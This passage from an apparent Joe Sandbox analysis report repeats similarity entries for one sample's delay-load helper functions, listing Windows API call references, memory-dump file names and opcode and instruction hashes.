                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 0ca0f44aec01865c184c3bfb6abbf3ea9603d83523e9ecf98d5c21a17c0dd738
                                                • Instruction ID: df3949cd46b5ad5c13a3852dadda2fa9f0f75fd3dcd2834eee0105791ef896c7
                                                • Opcode Fuzzy Hash: 0ca0f44aec01865c184c3bfb6abbf3ea9603d83523e9ecf98d5c21a17c0dd738
                                                • Instruction Fuzzy Hash: D1B0128A3DC1206C3204D1147E42D3701CCC0C3B1133086DAF80CD1D41EE805D891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e9343b75bda3976a521ed54ed988731184894b628f24b7e14c842e7a26bd083f
                                                • Instruction ID: 5e2a9876c9071644723e5e349048deec02fb4bfc903bf883c4d2a81da61048ea
                                                • Opcode Fuzzy Hash: e9343b75bda3976a521ed54ed988731184894b628f24b7e14c842e7a26bd083f
                                                • Instruction Fuzzy Hash: 29B012863DC1206C33449114BE02D3701DCC0C2B1133047DAF40CD1841EEC05DC81032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 60f8ebaeb0dc39f555f291c23442aa1cc090174e07e121a76fd060d5b234161b
                                                • Instruction ID: aa189cf9db9640a6a7829fffd69da059f9d50f1974bf6300e46fa0b610715e02
                                                • Opcode Fuzzy Hash: 60f8ebaeb0dc39f555f291c23442aa1cc090174e07e121a76fd060d5b234161b
                                                • Instruction Fuzzy Hash: AFB012863DC0206C32049114BF02D3701DCC0C2B1133047DAF80CD1841EEC14E891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: abfafced814c18b1c7d28f63e0f0bf9de1fd766caeb10d93bc509ee1e96a175e
                                                • Instruction ID: bc3adf317a97ee51fd63662de38d739b701257eb1bbcac6d6e51cd590263f222
                                                • Opcode Fuzzy Hash: abfafced814c18b1c7d28f63e0f0bf9de1fd766caeb10d93bc509ee1e96a175e
                                                • Instruction Fuzzy Hash: 97B012963DC0207C320451107F02D3701CCC0C2B1133046DAF80CE0852AE825E891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8fb80a89ca9ff8019d4dbd44f7e73119f54aa1d94e6dd8637020e6eb4a78751d
                                                • Instruction ID: 62df95d91a65f3872c6e96880f1103c5ecffb715b32db00500599959f35591fb
                                                • Opcode Fuzzy Hash: 8fb80a89ca9ff8019d4dbd44f7e73119f54aa1d94e6dd8637020e6eb4a78751d
                                                • Instruction Fuzzy Hash: D4B012863DC0206C320891147F02D3701CCC0C2B1133086DAF80CD1941EE814E8D1432
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 3025a301c1bf4bf5fa483b3293116977b7e381b1cb7a864d34b0cbae8ef2231d
                                                • Instruction ID: bbad681bdbb362a3be3ab95d750568379b1f8d20dbded73f4883e8c55056f194
                                                • Opcode Fuzzy Hash: 3025a301c1bf4bf5fa483b3293116977b7e381b1cb7a864d34b0cbae8ef2231d
                                                • Instruction Fuzzy Hash: 6CB012863DD0216C320895147E02D3701CCC0C3B11330C6DAF80CD1941EE804D8C1432
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 1397ee05296698f06505b8d39e712efc575cd41a14cb879dd03ac70f4937ebc6
                                                • Instruction ID: 9dc2da2265a49ce3c0c06d4f72a97facb8a2f1d8761b81534a6908880290dc5e
                                                • Opcode Fuzzy Hash: 1397ee05296698f06505b8d39e712efc575cd41a14cb879dd03ac70f4937ebc6
                                                • Instruction Fuzzy Hash: B4B0128A3DC2206C3204D1147F42D3701CCC0C2B1133046DAF80DD1D41EE814F8A1032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 2ad66bb3f9832ca1f49ed09ce12e2b2d9b7ff4f28917a233bc9888a9694bfdc1
                                                • Instruction ID: 190b6a28aec5b260f11fa39bcaafe7e4038675832329e3e4c998d852b0a21575
                                                • Opcode Fuzzy Hash: 2ad66bb3f9832ca1f49ed09ce12e2b2d9b7ff4f28917a233bc9888a9694bfdc1
                                                • Instruction Fuzzy Hash: ECB0128A3DC1206C3204D1247E42D3701CCC0C2B1133046DAF40CD1D41EE804D891132
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 49767be90494e792fa6b3b2805e41736f1c74d1efee42fce955906de52df8d69
                                                • Instruction ID: 348c5117177b5b445f9f1dcaeb33f14a9e33138dad36cb5534317068f0d764fc
                                                • Opcode Fuzzy Hash: 49767be90494e792fa6b3b2805e41736f1c74d1efee42fce955906de52df8d69
                                                • Instruction Fuzzy Hash: 1DB0128A3DC2206C3344D1147E42D3701CCC0C2B1133047DAF40CD1D41EE804DC95032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 050f0063cab454742288efeebea79e5ec5c8ef51647625ac157cedb1ccd9b10e
                                                • Instruction ID: d79d9f6e2f3c38304b2af53d93cbe72a3d8c4b8d3734096d12db74f7543ed120
                                                • Opcode Fuzzy Hash: 050f0063cab454742288efeebea79e5ec5c8ef51647625ac157cedb1ccd9b10e
                                                • Instruction Fuzzy Hash: 78B012863EC0206C320491147E03D3701CCC0C3B113308ADAF80CD5841EE804D881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b66dd36f5f145e2be3510574f464a104eb22b128cc7621219dfeadd721f57e22
                                                • Instruction ID: 17e0330c4badc3f6c63424f05bb0f794cdaa2ce9ecf10eccb8df73b4bb420d9f
                                                • Opcode Fuzzy Hash: b66dd36f5f145e2be3510574f464a104eb22b128cc7621219dfeadd721f57e22
                                                • Instruction Fuzzy Hash: 86B012823DC130AC3104D1097E47E3711CCC0C1B2133093DAF80CC1581EEC05C491032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 1ad5f43115476b4a3f8b4407bb06b123f56730c3cf6516c784e25a2c0ea8ad65
                                                • Instruction ID: 900186146aae036c1d4403711762f298508dbcbc36ff9169be73803443a1c19d
                                                • Opcode Fuzzy Hash: 1ad5f43115476b4a3f8b4407bb06b123f56730c3cf6516c784e25a2c0ea8ad65
                                                • Instruction Fuzzy Hash: 7AB012823DC0306C31449109BF07E3711CCC0C1B1133093DAF40CC1481EEC04C491032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a2b0f46119c63f5a81659a6dbf3d25ff8ee16021baf24af8713ae5d6e1110fcb
                                                • Instruction ID: e87b60418c2a4ab7f18505d1d36df0bcec5e918a5928e0deb2bce37539651bcd
                                                • Opcode Fuzzy Hash: a2b0f46119c63f5a81659a6dbf3d25ff8ee16021baf24af8713ae5d6e1110fcb
                                                • Instruction Fuzzy Hash: 1CB012823DC1306C32049109BE07E3711CCC0C1B1133053DAF40CC14C1EEC05C8C1032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 4d89c50bf5fc84af8c00ccf821113c0738b31015052c5b953ff3f06dd26c029d
                                                • Instruction ID: cb2da64a68ea96e7ebcdc3e7033368f9b0b117293af36113a3b9938f451622cd
                                                • Opcode Fuzzy Hash: 4d89c50bf5fc84af8c00ccf821113c0738b31015052c5b953ff3f06dd26c029d
                                                • Instruction Fuzzy Hash: 39B012823DD021BC310491187E02E3701CCC0C1B1133146EAF40CC2C81EE800C4C1031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 530a60941947b6441ccc36630f1130a2979d95c7706428ba5ae079ea6da3424c
                                                • Instruction ID: 6ca33deae457ae42a93eb33b03328434fac609ab4fae795a764dfcc824790dc4
                                                • Opcode Fuzzy Hash: 530a60941947b6441ccc36630f1130a2979d95c7706428ba5ae079ea6da3424c
                                                • Instruction Fuzzy Hash: A3B012823DD020BC314491187F02D3701CCC0C1B1133186EAF40CC2881EE800C4D1031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 5924d8f8b1e1cd3dc11e8ea1102a022c58309a73ab0fa2a511e4d501a66859ad
                                                • Instruction ID: 17da07cf0ed83aa67d70e22ad2d247fda941a90d0ad86d1d58785180144f809e
                                                • Opcode Fuzzy Hash: 5924d8f8b1e1cd3dc11e8ea1102a022c58309a73ab0fa2a511e4d501a66859ad
                                                • Instruction Fuzzy Hash: BBB012823DD020FC310491287E02D3701CCC0C1B2133186EAF80CC2881EE800C4C1031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c57697b6d08d97b2f3f7e2751e2064416bee98c18c05437d395ca387dd857819
                                                • Instruction ID: 02362cfdcf8f27005836afb6890387c799636768fe8752f4a64cb63b2e1ad47f
                                                • Opcode Fuzzy Hash: c57697b6d08d97b2f3f7e2751e2064416bee98c18c05437d395ca387dd857819
                                                • Instruction Fuzzy Hash: A5B012863DD020BD310451087F02C3701CCC8D1B1273187DAF408C0882AE800C491031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
